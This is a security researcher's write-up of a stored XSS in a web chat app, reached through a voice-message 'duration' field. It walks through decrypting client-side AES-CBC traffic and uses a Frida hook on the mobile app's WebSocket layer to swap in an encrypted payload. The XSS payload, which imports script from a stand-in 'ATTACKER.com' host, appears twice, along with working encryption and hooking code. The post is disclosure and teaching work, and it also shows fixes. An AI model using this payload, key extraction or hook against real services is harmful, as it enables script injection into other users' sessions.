Frida, AES and WebSockets: Turning a Mobile-only Feature into Stored Web XSS
Introduction
During an engagement, I found that the length of a voice message in a chat ended up in an innerHTML sink. The target was a web app with a companion mobile app that mirrors it, which matters later. Exploiting the sink turned out to be an adventure in itself, involving reverse engineering an AES implementation, hooking WebSocket traffic with Frida and simulating a physical device.
A simple innerHTML sink
This started the way a lot of findings do: staring at JavaScript and looking for something interesting.
This target had a lot of features, one of them being a chat. You could have two-person chats or group chats, and if you enabled the option, anyone could join a group chat. While analyzing the client-side source code, and the innerHTML sinks in particular, I noticed that the duration of a voice message, meant to display the audio clip's length, was rendered without sanitization. Good, but first we need to understand whether we can manipulate this field.
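To make the sink concrete, here is a minimal sketch of the pattern. The markup and the `renderDuration` and `escapeHtml` names are hypothetical, since the target's real code is not reproduced here. It builds the HTML string that would be assigned to innerHTML and shows how escaping would have neutralized the injection.

```javascript
// Hypothetical reconstruction of the vulnerable pattern: the duration is
// concatenated into markup that is later assigned to element.innerHTML.
function renderDuration(duration) {
  return '<span class="duration">' + duration + '</span>';
}

// Minimal HTML escaping that would have neutralized the injection.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const attackerDuration = "100</span><img src=x onerror=import('//ATTACKER.com')><span>";

const benign = renderDuration('5');
const injected = renderDuration(attackerDuration);
const escaped = renderDuration(escapeHtml(attackerDuration));

console.log(benign);
console.log(injected); // the img tag survives as live markup
console.log(escaped);  // the img tag is rendered as inert text
```

Setting the value through textContent instead of innerHTML would avoid the problem without any manual escaping.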
After a while I noticed that there was no option to send a voice message anywhere. I was confused, until I realized that, despite the interfaces being the same, the voice message button was only displayed if the app considered your device to be mobile. There are various ways to work with this limitation, but for now we can just open DevTools and click "Toggle device toolbar" to simulate a mobile phone.
Everything is Encrypted
It did not take long to discover that chat interactions were sent over WebSockets and encrypted. But the encryption was probably done client-side, so I was confident I could work it out. After some time reverse engineering and reading JavaScript, I concluded that every interaction was AES-CBC encrypted with session-specific keys. Basically:
- Key (x): dynamic key, unique per session
- IV (y): initialization vector, also unique per session
- Mode: AES-CBC with PKCS7 padding
This means that, to understand what was happening and possibly inject my payload, I needed to:
- Obtain the session's AES key and IV
- Decrypt a valid message and understand its content
- Modify the field I need
- Encrypt it again
- Replace a legitimate encrypted message with mine, or check whether I can send a message manually
Understanding the Message Flow
Since we need to understand how messages, and voice messages specifically, work, it was time for a combination of static analysis and runtime debugging. After a long while, I mapped out the following:
- User records a voice message in either the app or the mobile browser
- App uploads the audio file and gets a URL
- App creates a JSON object with metadata, which includes a `duration` field
- JSON is encrypted with the session keys
- The encrypted payload is sent via WebSocket
- Server relays it to the recipient
- Recipient decrypts and renders it, which includes the vulnerable `innerHTML`
So, the encryption happened client-side and the server just relayed the encrypted blobs. This meant that if I could intercept a message before encryption or modify the encrypted output, I could inject anything.
Extracting Session Keys
Where do the AES keys come from? After more reverse engineering, I found they're exchanged during session setup (it seems simple, but it took some time to put everything together):
- User creates or joins a group chat
- Attacker calls `endpoint1` and the server returns the value of `variable1`
- Attacker calls `/endpoint2` with the `variable1` value
- Server responds with key and IV
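The exchange above can be sketched roughly as follows. Only the endpoint order and the `variable1` hand-off come from the steps listed; the HTTP methods, the JSON field names (`variable1`, `key`, `iv`), the request body shape and the `fetchSessionKeys` helper itself are assumptions made for illustration.

```javascript
// Sketch of the two-step key exchange. HTTP methods, JSON field names and the
// request body shape are assumptions, not the target's documented API.
async function fetchSessionKeys(baseUrl, fetchImpl = fetch) {
  // Step 1: endpoint1 returns the intermediate value.
  const first = await fetchImpl(baseUrl + '/endpoint1');
  const { variable1 } = await first.json();

  // Step 2: endpoint2 exchanges that value for the AES key and IV.
  const second = await fetchImpl(baseUrl + '/endpoint2', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ variable1 }),
  });
  const { key, iv } = await second.json();
  return { key, iv };
}
```

Passing the fetch implementation as a parameter keeps the helper easy to exercise against a stub before pointing it at a real session.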
Now that I had the keys, it was time to decrypt the messages and check what was being sent over WebSockets.
I wrote two helper functions, one to encrypt payloads and one to decrypt them. The encryption helper looked like this:
import CryptoJS from 'crypto-js';

// Encrypt a plaintext string with AES-CBC and PKCS7 padding.
function aesEncrypt(plaintext, key, iv) {
  // Key and IV are parsed as UTF-8 strings
  const keyBytes = CryptoJS.enc.Utf8.parse(key);
  const ivBytes = CryptoJS.enc.Utf8.parse(iv);
  const encrypted = CryptoJS.AES.encrypt(plaintext, keyBytes, {
    iv: ivBytes,
    mode: CryptoJS.mode.CBC,
    padding: CryptoJS.pad.Pkcs7
  });
  return encrypted.toString(); // Base64
}

const x = 'something'; // Session key (placeholder)
const y = 'somethingelse'; // Session IV (placeholder)
const payload = JSON.stringify({
  url: "...",
  messageId: "...",
  duration: "100</span><img src=x onerror=import('//ATTACKER.com')><span>",
  // ...other fields
});
console.log(aesEncrypt(payload, x, y));
Decryption is the inverse: the same key, IV, mode and padding, applied to the Base64 ciphertext.
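The original decrypt helper is not shown here, so the following is only a sketch of what the inverse operation could look like. It uses Node's built-in `crypto` module in place of CryptoJS so that it runs without extra packages, and it assumes a 16-byte UTF-8 key and IV (AES-128); the key length actually used by the target is not stated. The `aesDecrypt` and `aesEncryptNode` names and the sample key and IV are placeholders.

```javascript
const crypto = require('node:crypto');

// Decrypt a Base64 AES-CBC ciphertext (PKCS7 padding is Node's default).
// Assumption: key and IV are 16-byte UTF-8 strings, i.e. AES-128.
function aesDecrypt(ciphertextB64, key, iv) {
  const decipher = crypto.createDecipheriv(
    'aes-128-cbc',
    Buffer.from(key, 'utf8'),
    Buffer.from(iv, 'utf8')
  );
  return Buffer.concat([
    decipher.update(ciphertextB64, 'base64'),
    decipher.final(),
  ]).toString('utf8');
}

// Matching encryptor, used here only to demonstrate the round trip.
function aesEncryptNode(plaintext, key, iv) {
  const cipher = crypto.createCipheriv(
    'aes-128-cbc',
    Buffer.from(key, 'utf8'),
    Buffer.from(iv, 'utf8')
  );
  return Buffer.concat([
    cipher.update(plaintext, 'utf8'),
    cipher.final(),
  ]).toString('base64');
}

const sampleKey = '0123456789abcdef'; // placeholder, not a real session key
const sampleIv = 'fedcba9876543210';  // placeholder, not a real session IV
const ciphertext = aesEncryptNode('{"duration":"5"}', sampleKey, sampleIv);
const roundTrip = aesDecrypt(ciphertext, sampleKey, sampleIv);
console.log(roundTrip);
```

When CryptoJS is given an explicit key and IV as parsed word arrays, its `toString()` output is the raw ciphertext in Base64, so a helper like this should be able to read it as long as the key length matches.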
Crafting the Payload
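The original decrypted JSON of a voice message looked something like this:
{
  "url": "https://target.com/uploads/voicemessage123",
  "duration": "5",
  "messageId": "123456",
  [ other fields ]
}
The only field I needed to change was `duration`. The payload closes the surrounding span, injects an img tag whose onerror handler imports a script from my server, and reopens a span so the rest of the markup stays intact.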
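As a small sketch of the tampering step, the helper below swaps the `duration` value in a decrypted message and serializes it again, ready for re-encryption. The `injectDuration` name is hypothetical, and the sample object only contains the fields shown in this post, not the elided ones.

```javascript
// Replace the duration of a decrypted voice message and re-serialize it.
// All other fields are left untouched.
function injectDuration(decryptedJson, htmlPayload) {
  const message = JSON.parse(decryptedJson);
  message.duration = htmlPayload;
  return JSON.stringify(message);
}

const originalMessage = JSON.stringify({
  url: 'https://target.com/uploads/voicemessage123',
  duration: '5',
  messageId: '123456',
});
const xssPayload = "100</span><img src=x onerror=import('//ATTACKER.com')><span>";

const tampered = injectDuration(originalMessage, xssPayload);
console.log(tampered);
```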
Frida to the Rescue
Ok, we can get our payload into a message and encrypt it. But how do we actually get it into the WebSocket stream?
Intercepting WebSockets isn't as straightforward as intercepting HTTP with proxies like Burp or Caido. Additionally, this requires an actual voice message being sent, so just sending our encrypted message over the WebSocket wouldn't work. Fortunately, the target had a mobile app that was basically the same environment as the web interface. As such, I could write a Frida script that intercepts the WebSocket layer and swaps the encrypted payload.
So, that's essentially what I did:
Java.perform(function () {
  const RealWebSocket = Java.use("okhttp3.internal.ws.RealWebSocket");

  // Hook the text-frame overload of send()
  RealWebSocket.send.overload('java.lang.String').implementation = function (message) {
    console.log("[->] Original:", message);
    // "42" is the Socket.IO prefix for an event packet
    if (message.startsWith('42')) {
      try {
        let dataArray = JSON.parse(message.substring(2));
        const eventName = dataArray[0];
        if (eventName === 'q_send_im_msg_ts') {
          let innerPayload = JSON.parse(dataArray[1]);
          // Replace with our malicious encrypted payload
          innerPayload.msgData = "JdAHG/Wvsmcj6dWerfH0VKMp...";
          dataArray[1] = JSON.stringify(innerPayload);
          const modified = "42" + JSON.stringify(dataArray);
          console.log("[<-] Modified:", modified);
          return this.send(modified);
        }
      } catch (e) {
        console.log("[!] Error:", e);
      }
    }
    // Anything else goes out unchanged
    return this.send(message);
  };
});
I ran it with `frida -U -f com.target.app -l hook.js`, and when I recorded a voice message inside a chat, the hook intercepted it, swapped the encrypted part with my XSS payload and sent it. The server accepted it and relayed it to the victim, and the XSS fired!
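The frame rewriting done by the hook can also be pulled out into a plain function and exercised outside Frida, which makes it easier to check before attaching to the app. This is a sketch: the `swapMsgData` name and the `to` field in the sample frame are hypothetical, while the `42` prefix, the event name and the `msgData` field come from the hook above.

```javascript
// Rewrite a Socket.IO event frame, replacing msgData for one event name.
// Frames that are not matching events, or that fail to parse, are returned as-is.
function swapMsgData(frame, eventName, newMsgData) {
  if (!frame.startsWith('42')) return frame;
  try {
    const dataArray = JSON.parse(frame.substring(2));
    if (dataArray[0] !== eventName) return frame;
    const innerPayload = JSON.parse(dataArray[1]); // the payload is itself a JSON string
    innerPayload.msgData = newMsgData;
    dataArray[1] = JSON.stringify(innerPayload);
    return '42' + JSON.stringify(dataArray);
  } catch (e) {
    return frame;
  }
}

const sampleFrame = '42' + JSON.stringify([
  'q_send_im_msg_ts',
  JSON.stringify({ msgData: 'ORIGINAL', to: 'room1' }), // "to" is a made-up field
]);
const swappedFrame = swapMsgData(sampleFrame, 'q_send_im_msg_ts', 'REPLACED');
console.log(swappedFrame);
```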
Simulating a Physical Device
At this point I had a working XSS, but to create a public group chat, I had to...
I was too deep into this to just let it go. As such, I initially spent a lot of time digging through the JavaScript and the Java from the mobile app to understand how devices were actually registered. I finally managed to work out the HTTP request needed for that, but I was missing something: a real device ID.
I had no way to get one, but I was determined. I spent a lot of time digging through user forums, setup guides and any kind of public discussion. And finally, in an obscure troubleshooting post, someone had shared their device ID while asking for help.
Note: device IDs are not sensitive, private or individual. They just identify the device model, so every unit of the same model shares the same ID.
With a device ID in hand, I could now simulate a device connection. I registered a device to my test account and created a public group chat. The attack was now complete.